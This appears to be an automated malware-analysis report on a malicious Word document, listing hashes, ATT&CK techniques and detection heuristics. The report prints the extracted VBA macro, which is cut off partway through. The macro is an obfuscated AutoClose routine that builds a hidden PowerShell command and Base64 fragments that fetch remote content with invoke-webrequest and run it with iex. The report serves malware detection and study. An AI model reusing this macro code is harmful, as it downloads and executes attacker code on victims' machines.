Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 a9d59acdabe2dc8e…

MALICIOUS

Office (OOXML)

Size: 245.6 KB
Created: 2021-08-25 17:07:00 UTC
Authoring application: Microsoft Office Word 15.0000
First seen: 2021-09-25
MD5: 28476abe4e8cf666f1f29304ac71b19d
SHA-1: 6c72171ba98735dfe8f306e51d975e6db668564e
SHA-256: a9d59acdabe2dc8e73330be12cba312d61ad912cbb7e92a78953ef4fc3236dad
Risk Score: 162

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1203 Exploitation for Client Execution

This Office document was flagged as malicious. The file embeds external URLs that direct users to attacker-controlled resources. Specific URLs and indicators for this sample are listed in the indicators section.

Heuristics 5

  • VBA project inside OOXML (severity: medium, 3 related findings) [OOXML_VBA]
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA (severity: critical) [OLE_VBA_SHELL]
    Shell() call in VBA
  • Auto_Close macro (severity: high) [OLE_VBA_AUTOCLOSE]
    Auto_Close macro
  • VBA p-code auto-exec with execution tokens (severity: high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL (severity: info) [EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordml — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordml — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape — In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 7101 bytes
SHA-256: a7b0639dfd79e3cbe7e730c09158d562f0a02a425311beed2c2a3284c2edfca9
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Tracking"
Sub AutoClose()
    Dim IO_LB As String
    JL_NB = Array("-", "e", "i", "c", "y", "b", "a", "s", " ", "w", "p", "d", "l", "h", "r", "x", "o", "n", "u", "t")
    Dim GS_TF As String
    GS_TF = "ZgB1AG4AYwB0AGkAbwBuACAAYQAoAC"
    Dim ER_TE As String
    ER_TE = "QAeAApAHsAcgBlAHQAdQByAG4AIABbAFMAe"
    IO_LB = IO_LB + JL_NB(10)
    IO_LB = IO_LB + JL_NB(16)
    Dim FT_LA As String
    FT_LA = "QBzAHQAZQB"
    Dim DM_MI As String
    DM_MI = "tAC4AVABlAHgAdAAuAEUAbgBjAG8AZABp"
    IO_LB = IO_LB + JL_NB(9)
    IO_LB = IO_LB + JL_NB(1)
    Dim GO_SE As String
    GO_SE = "AG4AZwBdADoAOgBVAFQARgA4AC4ARwBl"
    GN_QI = GN_QI & GS_TF & ER_TE & FT_LA & DM_MI & GO_SE
    Dim IT_NB As String
    IT_NB = "AHQAUwB0AHIAaQBuAGcAKABbAFMAeQ"
    IO_LB = IO_LB + JL_NB(14)
    IO_LB = IO_LB + JL_NB(7)
    Dim BO_MG As String
    BO_MG = "BzAHQAZQBtAC4AQwBvAG4AdgBlAHIAd"
    Dim IQ_LC As String
    IQ_LC = "ABdADoA"
    IO_LB = IO_LB + JL_NB(13)
    IO_LB = IO_LB + JL_NB(1)
    Dim IL_TH As String
    IL_TH = "OgBGAHIAbwBtAEIAYQBzAGUANgA0AFM"
    Dim BO_PC As String
    BO_PC = "AdAByAGkAbgB"
    GN_QI = GN_QI & IT_NB & BO_MG & IQ_LC & IL_TH & BO_PC
    IO_LB = IO_LB + JL_NB(12)
    IO_LB = IO_LB + JL_NB(12)
    Dim GM_PJ As String
    GM_PJ = "nACgAJAB4ACkAKQB9A"
    Dim HQ_PI As String
    HQ_PI = "DsAaQBlAHgAIAAkACgAYQ"
    IO_LB = IO_LB + JL_NB(8)
    IO_LB = IO_LB + JL_NB(0)
    Dim DT_SE As String
    DT_SE = "AgACQAK"
    Dim DP_LG As String
    DP_LG = "AAkACgAJAAoAGkAb"
    IO_LB = IO_LB + JL_NB(9)
    IO_LB = IO_LB + JL_NB(2)
    Dim CM_LG As String
    CM_LG = "gB2AG8A"
    GN_QI = GN_QI & GM_PJ & HQ_PI & DT_SE & DP_LG & CM_LG
    Dim BN_NJ As String
    BN_NJ = "awBlAC0AdwBlAGIA"
    IO_LB = IO_LB + JL_NB(17)
    IO_LB = IO_LB + JL_NB(11)
    Dim CN_OF As String
    CN_OF = "cgBlAHEAdQBlA"
    Dim GP_SC As String
    GP_SC = "HMAdAAgACcAaAB0AHQAcABzADoALw"
    IO_LB = IO_LB + JL_NB(16)
    IO_LB = IO_LB + JL_NB(9)
    Dim HM_SJ As String
    HM_SJ = "AvAHUAcwB"
    Dim FL_LG As String
    FL_LG = "wAHIAZAA1A"
    GN_QI = GN_QI & BN_NJ & CN_OF & GP_SC & HM_SJ & FL_LG
    IO_LB = IO_LB + JL_NB(7)
    IO_LB = IO_LB + JL_NB(19)
    Dim BR_QC As String
    BR_QC = "DEANQAwAGMAZQB"
    Dim FM_TE As String
    FM_TE = "uAHQAcgBhAGwALgB0AGEAYgB"
    IO_LB = IO_LB + JL_NB(4)
    IO_LB = IO_LB + JL_NB(12)
    Dim FT_NH As String
    FT_NH = "sAGUALg"
    Dim DS_SJ As String
    DS_SJ = "BjAG8AcgBlAC4AdwBpAG4AZABvAHcAcw"
    IO_LB = IO_LB + JL_NB(1)
    IO_LB = IO_LB + JL_NB(8)
    Dim BS_SH As String
    BS_SH = "AuAG4AZQB0A"
    GN_QI = GN_QI & BR_QC & FM_TE & FT_NH & DS_SJ & BS_SH
    Dim CQ_LI As String
    CQ_LI = "C8AdwBhAHIAZQBoAG8Ad"
    IO_LB = IO_LB + JL_NB(13)
    IO_LB = IO_LB + JL_NB(2)
    Dim DL_PC As String
    DL_PC = "QBzAGUAPwAkAGYAaQBsAHQ"
    Dim HT_TF As String
    HT_TF = "AZQByAD0AUABhAHIAdABpAHQAaQBvAG4"
    IO_LB = IO_LB + JL_NB(11)
    IO_LB = IO_LB + JL_NB(11)
    Dim DL_SD As String
    DL_SD = "ASwBlAHkAJQAyADAA"
    Dim JO_NC As String
    JO_NC = "ZQBxACUAMgAwACUAMgA3AHMAd"
    GN_QI = GN_QI & CQ_LI & DL_PC & HT_TF & DL_SD & JO_NC
    IO_LB = IO_LB + JL_NB(1)
    IO_LB = IO_LB + JL_NB(17)
    Dim FL_RH As String
    FL_RH = "ABhAGcA"
    Dim BP_PF As String
    BP_PF = "ZQAlADIANwAmACQAUwBlAGwA"
    IO_LB = IO_LB + JL_NB(8)
    IO_LB = IO_LB + JL_NB(0)
    Dim DK_TD As String
    DK_TD = "ZQBjAHQAPQBkAGEAdA"
    Dim FT_OC As String
    FT_OC = "BhACYAcwB2AD0AMgAwADEANwAtADAAN"
    IO_LB = IO_LB + JL_NB(1)
    IO_LB = IO_LB + JL_NB(15)
    Dim IT_SD As String
    IT_SD = "AAtADEANwAmAHMAcwA9A"
    GN_QI = GN_QI & FL_RH & BP_PF & DK_TD & FT_OC & IT_SD
    Dim AM_OH As String
    AM_
... (truncated)
vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 20992 bytes
SHA-256: 962f851ece639d82e09d3960b91a1cdb59a74c96c006e0045428cf173c19f803